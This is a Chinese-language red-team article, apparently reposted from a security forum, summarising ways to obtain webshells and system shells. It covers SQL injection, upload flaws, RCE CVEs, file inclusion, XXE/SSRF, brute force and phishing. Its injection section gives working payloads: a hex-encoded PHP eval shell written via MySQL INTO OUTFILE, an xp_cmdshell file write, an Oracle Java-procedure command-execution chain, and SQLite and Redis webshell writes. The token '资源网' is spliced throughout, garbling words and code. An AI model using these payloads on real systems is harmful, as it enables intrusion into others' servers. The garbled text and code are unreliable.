运动会红队比赛口号（红队-Getshell总结）

php零基础教程

Author: sm0nk@深蓝攻防实验室，原文：https://xz.aliyun.com/t/7500无论是常规渗透测试还是攻防对抗，亦或黑灰产对抗、APT攻击，getshell 资源网是一个从内到外的里程碑成果。

我们接下来总结下常见拿shell的一些思路和方法文中可能有一些不足之处，还望大佬不吝赐教

0x01 注入getshell一般前提条件：有权限、知道路径mysqlselect0资源网x3c3f70687020a6576616c28245f504f53545b615d293ba3f3eintooutfile

/var/www/html/1.phpSqlserver存储过程xp_cmd资源网shell;execmaster..xp_cmdshellecho ^^ > D:\\WWW\\2333.aspx

;--Oracle1、创建JAVA包selectdbms_xmlquery.newco资源网ntext(declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate create or replace and compile ja资源网va source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static 资源网String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( R资源网untime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.re资源网adLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toStr资源网ing();}}};commit;end;

)fromdual;2、JAVA权限selectdbms_xmlquery.newcontext(declare PRAGMA AUTONOMOUS_TRAN资源网SACTION;begin execute immediate begin dbms_java.grant_permission( SYSTEM, SYS:java.io.FilePermission资源网, <>,EXECUTE);end;commit;end;

)fromdual;3、创建函数selectdbms_xmlquery.newcontext(declare PRAGMA AUTONOMOU资源网S_TRANSACTION;begin execute immediate create or replace function LinxRunCMD(p_cmd in varchar2) retur资源网n varchar2 as language java name LinxUtil.runCMD(java.lang.String) return String; ;commit;end;

)fromd资源网ual;URL执行id=602||utl_inadd.get_host_name((select LinxRUNCMD(cmd/cdird:/) from dual))--postgresql

COPY资源网 (select ) to /tmp/1.php;sqlite3;attach database D:\\www\\008.php as tt;create TABLE tt.exp (dataz t资源网ext) ; insert INTO tt.exp (dataz) VALUES (x

3c3f70687020406576616c28245f504f53545b27636d64275d293b3f3资源网e);redis%0D%0Aconfig%20set%20dir%20%2Fvar%2Fwww

%2Fhtml2F%0D%0Aconfig%20set%20dbfilename%20shell%2Eph资源网p%0D%0Aset%20x%2022%3C%3Fphp%20phpinfo%28%29%3B%%

203F%3E%22%0D%0Asave%0D%0APS：oracle成功率受限于与数据库版本以及注入资源网点当然注入不一定都能拿到webshell，比如站库分离但不管是否站库分离，只要权限够能够执行系统命令，反弹cmdshell 也是不错的选择。

比如sa权限结合xp_cmdshell 存储过程，直接执行p资源网owershell,反弹到cobalt strike …0x02 上传 getwebshell 上传漏洞对于getshell 还是高频的，无论是前台上传点，还是后台（通过口令进入、或者XSS到后台、逻资源网辑漏洞越权）上传点，当然也有可能要结合一些Web Server的解析漏洞。

但像IIS和apache解析漏洞因为太老，现在成功概率都小很多类似直接的上传漏洞就可以getshell的漏洞，例如IIS PU资源网T上传、Tomcat PUT 上传，因为落脚点最终都跟上传有关系，这个就不单独去枚举。

还有一批像一些编辑器（FCK、editor、CKedtor…）存在上传漏洞可以getshell这一系列，一般是基于资源网信息收集确定是否存在漏洞，然后进一步利用（发现漏洞比利用漏洞更艺术）这个期间可能涉及逻辑绕过、WAF对抗、杀软绕过、执行层，主要解决四点：。

代码或逻辑问题，可以上传脚本文件躲过WAF对脚本文件及上传内资源网容的校验解决落地杀执行过程，躲过流量监控或者系统层监控同样RCE 也需要关注以上后几点，因为前面的入口场景不同0x03 RCE getshell。

RCE是统称，包括远程代码执行、远程命令执行当然这两个资源网概念还是有意思的，比如struts2漏洞有的叫命令执行有的叫代码执行这都不重要一般根据触发点来命名Java系的OGNL 表达式注入、EL注入、反序列化。

PHP系列的eval 类、伪协议类代码执行、s资源网ystem类命令执行当然反序列化漏洞基本上编程语言都有，除了漏洞利用getshell，用作免杀后门webshell也是一个不错的思路推荐正由于代码执行的部分结果是执行了系统命令，在命令执行的加持下，可资源网以直接拿到应用或系统的shell，也是正统策略。

根据《2019年Web应用安全年度报告》，高频系列27个漏洞漏洞（这些漏洞都值得深入分析及利用），大部分为远程代码执行，同时RCE系列，Java 组件也资源网占比最大。

列表如下：Harbor API SQL注入(CVE-2019-19026/CVE-2019-19029)Thinkcmf任意内容包含远程代码执行泛微E-cology OA数据库配置信息泄漏F资源网astjson远程拒绝服务

GhostScript远程代码执行(CVE-2019-14811)泛微E-cology OA系统远程代码执行Apache Solr远程代码执行(CVE-2019-0193)F资源网asterXML jackson-databind远程代码执行(CVE-2019-14439)

FasterXML jackson-databind远程代码执行(CVE-2019-12384)Faste资源网rXML jackson-databind远程代码执行(CVE-2019-14379)Xstream远程代码执行(CVE-2019-10173)

致远OA A8前台getshellApache axis资源网远程代码执行CoreMail未授权访问接口参数注入Weblogic远程代码执行(CVE-2019-2729)Weblogic远程代码执行(CVE-2019-2725)

Confluence远程代码执行(资源网CVE-2019-3398)Confluence远程代码执行(CVE-2019-3396)Ruby On Rails任意文件读取(CVE-2019-5418)Jenkins远程代码执行(CVE-201资源网9-1003030)

ColdFusion远程代码执行(CVE-2019-7091)Spring Boot Actuator远程代码执行Drupal8 REST Module远程代码执行(CVE-201资源网9-6340)Jenkins远程代码执行(CVE-2019-1003000)

Apache Solr远程代码执行(CVE-2019-17558)Fastjson远程代码执行Jenkins远程代码执行(C资源网VE-2019-1003000)以上漏洞利用总结，可私M0x04 包含getwebshell

文件包含，常见JSP、ASPx、PHP 都有包含，但主要还是PHP的包含好用因为可以包含任意路径的任意后缀，资源网能控制include类函数的输入结合系统特性文件或者上传的文件结合，可以拿到webshellJSP包含，默认情况下动态包含WEB路径下的JSP文件（静态包含可以包含任意后缀的文本文件，但不支持变量动态资源网赋值暂不说明），2月份的CVE-2020-1938 Tomcat 文件包含漏洞，这个漏洞看上去是包含了任意格式的文件，但其实是因为AJP协议。

0x05 漏洞组合拳getshell绕过既有认证+后台漏洞资源网口令猜测是门艺术活，进入后台多种漏洞的利用，包括前面提到的漏洞常见高危系列，还有一些备份还原、导入导出、模板编辑等功能登录逻辑绕过、越权类，搞定后台。

进行典型漏洞利用通过XSS钓到cookie，或者资源网利用CSRF类漏洞“借刀杀人”搞到后台权限进行典型漏洞利用网站后台Getshell的方法总结XXEXXE漏洞，最理想的状态就是直接可以代码执行（类似PHP expert）；大多数还是以文件读取信息收集资源网为主，结合源码或者配置文件（例如/etc/shadow、tomcat-users.xml等）getshell；还可以通过XXE的SSRF进行隔山打牛式getshell。

当然对于漏洞挖掘来讲，无论是xm资源网l格式还是json格式的POST数据包都值得多关注下说不定就有惊喜呢SSRF + RCE原理上SSRF可以结合所有RCE（反序列化、s2、mysql … ；github 搜索SSRFmap、ssrf_资源网proxy）的漏洞进行组合利用，只是我们在平常实例角度用SSRF+redis未授权用的多一些。

任意文件读取Getshell正常的一般是通过读取web.xml 获取class文件，然后反编译，找到代码的资源网一些漏洞进而拿到系统的权限当然还有文件读取加文件上传的曲折配合0x06 系统层getcmdshell。

暴力破解的艺术，毕竟锤子开锁和要是开锁在入侵角度结果是一样的常规协议：SSH、RDP、SMB、VP资源网C、Redis 等中间件类通过数据库执行语句获得了系统shell，对于获取权限，比sql注入更直接设备层：VPN、防火墙，搞定这种边界设备，单车变摩托。

0x07 钓鱼 getcmdshell发送钓鱼邮资源网件，捆绑的马，访问即加载、点击即执行类的马这一类攻击一般结合社工，例如借用IT管理员发送或某领导的账号去发送（所以这时候的邮箱的0day就灰常重要了，当然如果在邮箱内部找到类似VPN或者密码表类，也不资源网需要这么麻烦，一把梭…），可信度就高很多。

对于红队来讲，钓的鱼儿还是以IT部门系列为主，普通办公区的主机权限还需要做更多的工作0x08 红队shell竞争分析拼信息收集，漏洞点，别人找不到，我找的到（资源网例如移动端、物联网等接口信息，当然这种shell，一般距离核心应用可能也远一些）；

拼利用速度，自动化一条龙（基本属于日常漏洞和工程化的积累）；拼0day （VPN --- Mail --- OA --资源网- java组件 --- CMS --- 关键设备）；拼细节漏洞，组合利用以上为本次所感所想，当然除了这种按照漏洞类型大类去分类，还有一些具体的漏洞也可以直接getshell，本次分析意义，就是在没资源网有思路的时候，有个相对体系性思考框架。

毕竟储备充足才会看上去像运气一样水到渠成，其实都是局部真相推荐学习教程CTF网络安全大赛学习从入门到精通教程、工具、writeup合集渗透测试工程师基础+进阶2套资源网视频学习教程零基础入门到高手2018-2019零基础渗透测试web安全攻防网络安全漏洞讲解培训视频教程

2018-2019安卓逆向Android安全反编译脱壳加固IDA调试实战培训教程5套web安全从资源网入门到精通视频教程Wireshark网络分析实践视频教程全新企业级Linux高端运维实战高薪就业课程高可用架构+负载均衡+企业安全

web渗透之SRC漏洞挖掘视频教程python从基础到网络爬虫数据分资源网析人工智能机器学习深度学习24套视频教程IOS逆向与安全学习视频教程2019新软考网络信息安全工程师备考实战教程软考安全工程师串讲【教程】升级版HCIA-Security V3.0认证课程华为IC资源网T领域网络安全工程师教程

IOS逆向与安全学习视频教程深度学习之神经网络 CNN/RNN/GAN 算法原理+实战视频教程2019年新逆向破解学习视频教程十天入门逆向破解免责声明本公众号资源均通过网络资源网等合法渠道获取，该资料仅作为技术学习交流使用，其版权归出版社或者原作者所有，本公众号不对所涉及的版权问题负责。

如原作者认为侵权，请留言联系小编，小编立即删除文章，谢谢扫描关注乌云安全